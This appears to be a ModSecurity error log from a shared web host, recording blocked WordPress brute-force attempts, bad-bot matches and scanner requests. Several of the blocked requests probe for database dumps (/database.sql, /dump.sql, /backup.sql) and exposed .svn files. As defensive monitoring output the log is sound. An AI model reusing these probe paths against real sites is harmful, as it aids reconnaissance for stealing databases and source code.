[Tue May 26 13:45:35.436324 2026] [security2:error] [pid 536875:tid 537082] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWp-r_-FTveSGlx1H9-AAAANI"]
[Tue May 26 13:45:36.868902 2026] [security2:error] [pid 536875:tid 537088] [client 106.192.248.115:56526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWqOr_-FTveSGlx1H-FAAAANg"]
[Tue May 26 13:45:36.873805 2026] [security2:error] [pid 536875:tid 537088] [client 106.192.248.115:56526] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWqOr_-FTveSGlx1H-FAAAANg"]
[Tue May 26 13:45:37.211380 2026] [security2:error] [pid 544395:tid 544529] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWqBmrs7g3RMCdp8Xj1QAAAAQ"]
[Tue May 26 13:45:37.510242 2026] [security2:error] [pid 536875:tid 537107] [client 185.191.171.12:11464] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVWqer_-FTveSGlx1H-HAAAAOs"]
[Tue May 26 13:45:37.510428 2026] [security2:error] [pid 536875:tid 537107] [client 185.191.171.12:11464] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVWqer_-FTveSGlx1H-HAAAAOs"]
[Tue May 26 13:45:38.699769 2026] [security2:error] [pid 544395:tid 544455] [remote 54.38.29.86:52542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVWqhmrs7g3RMCdp8Xj7QAAbTs"]
[Tue May 26 13:45:38.893301 2026] [security2:error] [pid 536875:tid 537078] [client 85.204.70.118:42876] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shahvishaal.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVWqur_-FTveSGlx1H-NAAAAM4"]
[Tue May 26 13:45:38.988019 2026] [security2:error] [pid 544395:tid 544541] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWqhmrs7g3RMCdp8Xj7gAAABA"]
[Tue May 26 13:45:39.721956 2026] [security2:error] [pid 536875:tid 536970] [remote 45.148.10.218:52079] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/database.sql"] [unique_id "ahVWq-r_-FTveSGlx1H-PwAApl4"]
[Tue May 26 13:45:40.062806 2026] [security2:error] [pid 536875:tid 536983] [remote 45.148.10.218:52079] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/dump.sql"] [unique_id "ahVWrOr_-FTveSGlx1H-QQAA9ms"]
[Tue May 26 13:45:40.223500 2026] [security2:error] [pid 536875:tid 536969] [remote 45.148.10.218:52079] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/backup.sql"] [unique_id "ahVWrOr_-FTveSGlx1H-QgAApF0"]
[Tue May 26 13:45:40.380848 2026] [security2:error] [pid 536875:tid 536956] [remote 45.148.10.218:52079] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/db.sql"] [unique_id "ahVWrOr_-FTveSGlx1H-RAAAtlA"]
[Tue May 26 13:45:40.919798 2026] [security2:error] [pid 544395:tid 544531] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWrBmrs7g3RMCdp8XkCQAAAAY"]
[Tue May 26 13:45:41.864198 2026] [security2:error] [pid 536875:tid 537114] [client 195.178.110.34:41002] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVWrer_-FTveSGlx1H-UQAAAPI"]
[Tue May 26 13:45:42.768281 2026] [security2:error] [pid 536875:tid 537017] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWrur_-FTveSGlx1H-WgAAAJE"]
[Tue May 26 13:45:42.791430 2026] [security2:error] [pid 544395:tid 544593] [client 129.222.147.134:55704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWrhmrs7g3RMCdp8XkMQAAAEQ"]
[Tue May 26 13:45:42.791596 2026] [security2:error] [pid 544395:tid 544593] [client 129.222.147.134:55704] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWrhmrs7g3RMCdp8XkMQAAAEQ"]
[Tue May 26 13:45:43.177617 2026] [security2:error] [pid 536875:tid 537112] [client 195.178.110.34:41004] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVWr-r_-FTveSGlx1H-bAAAAPA"]
[Tue May 26 13:45:43.614961 2026] [security2:error] [pid 536875:tid 537079] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVWr-r_-FTveSGlx1H-cQAAAM8"]
[Tue May 26 13:45:43.750709 2026] [security2:error] [pid 536875:tid 537069] [client 78.47.98.55:7868] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVWr-r_-FTveSGlx1H-bQAAAMU"], referer: http://ucdc.co.in/
[Tue May 26 13:45:44.348054 2026] [security2:error] [pid 544395:tid 544583] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWrxmrs7g3RMCdp8XkRQAAADo"]
[Tue May 26 13:45:44.936097 2026] [security2:error] [pid 544395:tid 544502] [remote 143.198.237.186:54382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 186.237.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVWsBmrs7g3RMCdp8XkTgAAGGo"]
[Tue May 26 13:45:45.164656 2026] [security2:error] [pid 536875:tid 536879] [remote 74.7.241.58:60380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVWser_-FTveSGlx1H-iwAAqQM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 13:45:46.321183 2026] [security2:error] [pid 536875:tid 537061] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWser_-FTveSGlx1H-mAAAAL0"]
[Tue May 26 13:45:46.556859 2026] [security2:error] [pid 536875:tid 536943] [remote 13.42.154.237:45834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.154.42.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVWsur_-FTveSGlx1H-qQAA50M"]
[Tue May 26 13:45:46.973133 2026] [security2:error] [pid 544395:tid 544611] [client 85.204.70.118:48428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVWshmrs7g3RMCdp8XkcwAAAFY"]
[Tue May 26 13:45:46.973306 2026] [security2:error] [pid 544395:tid 544611] [client 85.204.70.118:48428] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVWshmrs7g3RMCdp8XkcwAAAFY"]
[Tue May 26 13:45:47.507370 2026] [security2:error] [pid 544395:tid 544604] [client 106.192.248.115:56825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWsxmrs7g3RMCdp8XkgwAAAE8"]
[Tue May 26 13:45:47.512545 2026] [security2:error] [pid 544395:tid 544604] [client 106.192.248.115:56825] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWsxmrs7g3RMCdp8XkgwAAAE8"]
[Tue May 26 13:45:47.595547 2026] [security2:error] [pid 544395:tid 544636] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWsxmrs7g3RMCdp8XkfQAAAG8"]
[Tue May 26 13:45:49.812120 2026] [security2:error] [pid 536875:tid 537106] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWter_-FTveSGlx1H-wAAAAOo"]
[Tue May 26 13:45:49.851937 2026] [security2:error] [pid 544395:tid 544638] [client 216.73.217.138:6413] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVWtRmrs7g3RMCdp8XkogAAcVo"]
[Tue May 26 13:45:51.119376 2026] [core:crit] [pid 536875:tid 537051] (13)Permission denied: [client 52.167.144.220:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:45:51.729522 2026] [security2:error] [pid 536875:tid 537062] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWt-r_-FTveSGlx1H-2gAAAL4"]
[Tue May 26 13:45:52.929651 2026] [security2:error] [pid 544395:tid 544539] [client 129.222.147.134:54507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWuBmrs7g3RMCdp8XkygAAAA4"]
[Tue May 26 13:45:52.930457 2026] [security2:error] [pid 544395:tid 544539] [client 129.222.147.134:54507] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWuBmrs7g3RMCdp8XkygAAAA4"]
[Tue May 26 13:45:53.491688 2026] [security2:error] [pid 544395:tid 544589] [client 64.233.173.227:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/index.php"] [unique_id "ahVWuBmrs7g3RMCdp8XkzgAAAEA"]
[Tue May 26 13:45:53.494930 2026] [security2:error] [pid 544395:tid 544540] [client 195.178.110.34:36274] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/.svn/entries"] [unique_id "ahVWuRmrs7g3RMCdp8Xk1gAAAA8"]
[Tue May 26 13:45:53.501517 2026] [security2:error] [pid 544395:tid 544616] [client 65.109.81.157:29492] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "toronto121mortgage.com"] [uri "/process.php"] [unique_id "ahVWuRmrs7g3RMCdp8Xk1wAAAFs"], referer: http://toronto121mortgage.com/index.php
[Tue May 26 13:45:53.845123 2026] [security2:error] [pid 544395:tid 544639] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWuRmrs7g3RMCdp8Xk1AAAAHI"]
[Tue May 26 13:45:54.677767 2026] [security2:error] [pid 536875:tid 536920] [remote 103.245.34.226:39580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.34.245.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVWuur_-FTveSGlx1H-_gAAxCw"]
[Tue May 26 13:45:55.525118 2026] [security2:error] [pid 544395:tid 544569] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWuxmrs7g3RMCdp8Xk8QAAACw"]
[Tue May 26 13:45:55.812498 2026] [core:crit] [pid 544395:tid 544613] (13)Permission denied: [client 40.77.167.56:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:45:56.572158 2026] [security2:error] [pid 544395:tid 544575] [client 91.84.124.42:56413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.124.84.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVWvBmrs7g3RMCdp8XlEQAAADI"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 13:45:56.572310 2026] [security2:error] [pid 544395:tid 544575] [client 91.84.124.42:56413] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVWvBmrs7g3RMCdp8XlEQAAADI"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 13:45:56.662315 2026] [security2:error] [pid 544395:tid 544601] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWvBmrs7g3RMCdp8XlDgAAAEw"]
[Tue May 26 13:45:57.279285 2026] [security2:error] [pid 544395:tid 544481] [remote 103.95.119.103:51576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVWvRmrs7g3RMCdp8XlGwAAKlU"]
[Tue May 26 13:45:57.754023 2026] [security2:error] [pid 544395:tid 544541] [client 106.192.248.115:57131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWvRmrs7g3RMCdp8XlLgAAABA"]
[Tue May 26 13:45:57.754196 2026] [security2:error] [pid 544395:tid 544541] [client 106.192.248.115:57131] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWvRmrs7g3RMCdp8XlLgAAABA"]
[Tue May 26 13:45:59.325605 2026] [security2:error] [pid 544395:tid 544646] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWvhmrs7g3RMCdp8XlPgAAAHk"]
[Tue May 26 13:46:00.460468 2026] [security2:error] [pid 536875:tid 537050] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWwOr_-FTveSGlx1H_SgAAALI"]
[Tue May 26 13:46:00.901278 2026] [core:error] [pid 536875:tid 537033] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:00.901303 2026] [core:error] [pid 536875:tid 537033] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:00.901419 2026] [security2:error] [pid 536875:tid 537033] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahVWwOr_-FTveSGlx1H_YQAAAKE"]
[Tue May 26 13:46:00.903206 2026] [security2:error] [pid 544395:tid 544553] [client 195.178.110.34:57396] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVWwBmrs7g3RMCdp8XlUAAAABw"]
[Tue May 26 13:46:01.980758 2026] [security2:error] [pid 544395:tid 544396] [remote 46.101.54.125:46198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVWwRmrs7g3RMCdp8XlVQAAMQA"]
[Tue May 26 13:46:02.230167 2026] [security2:error] [pid 544395:tid 544604] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWwRmrs7g3RMCdp8XlVwAAAE8"]
[Tue May 26 13:46:03.237864 2026] [security2:error] [pid 544395:tid 544546] [client 129.222.147.134:57742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWwxmrs7g3RMCdp8XlXgAAABU"]
[Tue May 26 13:46:03.237979 2026] [security2:error] [pid 544395:tid 544546] [client 129.222.147.134:57742] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWwxmrs7g3RMCdp8XlXgAAABU"]
[Tue May 26 13:46:03.918846 2026] [core:error] [pid 544395:tid 544543] [client 38.62.229.225:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:03.918867 2026] [core:error] [pid 544395:tid 544543] [client 38.62.229.225:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:04.025965 2026] [security2:error] [pid 536875:tid 537107] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWw-r_-FTveSGlx1H_nAAAAOs"]
[Tue May 26 13:46:04.351757 2026] [core:error] [pid 544395:tid 544626] [client 38.62.229.224:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
